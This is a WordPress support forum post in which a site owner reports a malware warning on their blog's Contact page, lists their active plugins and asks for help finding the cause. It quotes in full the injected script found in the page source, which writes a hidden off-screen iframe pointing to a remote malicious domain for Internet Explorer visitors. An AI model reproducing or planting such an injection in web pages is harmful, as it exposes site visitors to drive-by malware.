Support » Plugin: FancyBox for WordPress » Possible malware

  • Resolved SherabGyamtso

    (@sherabgyamtso)


    I have last version of your plugin and WordPress.

    Everything was ok until today. I’ve got a report from sitelock that my Contact page on my blog is infected with malware with iframe redirecting to h t t p : / / 203koko.eu/hjnfh/ipframe2.php

    Chcecked my page source on this contact page and found something like this:

    <script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(‘ <div style=”position:absolute;left:-2000px;width:2000px”><iframe src=”http://203koko.eu/hjnfh/ipframe2.php” width=”20″ height=”30″ ></iframe></div>’);}/*]]>*/</script>

    I desactivated just Total Cache and this page is not infected anymore.

    I have other plugins (up to date) active:

    Akismet Version 3.0.4
    Custom Posts Per Page Version 1.7.1
    FancyBox for WordPress Version 3.0.2
    GetSocial Version 2.0.1
    NextCellent Gallery Version 1.9.25.1
    Official StatCounter Plugin Version 1.6.9
    Use Google Libraries Version 1.6.2
    WordPress SEO Version 1.7.1

    Can anybody helps me to determine source of this malware?

    Best

    Maciek

    https://wordpress.org/plugins/w3-total-cache/

Viewing 15 replies - 1 through 15 (of 110 total)
Viewing 15 replies - 1 through 15 (of 110 total)
  • The topic ‘Possible malware’ is closed to new replies.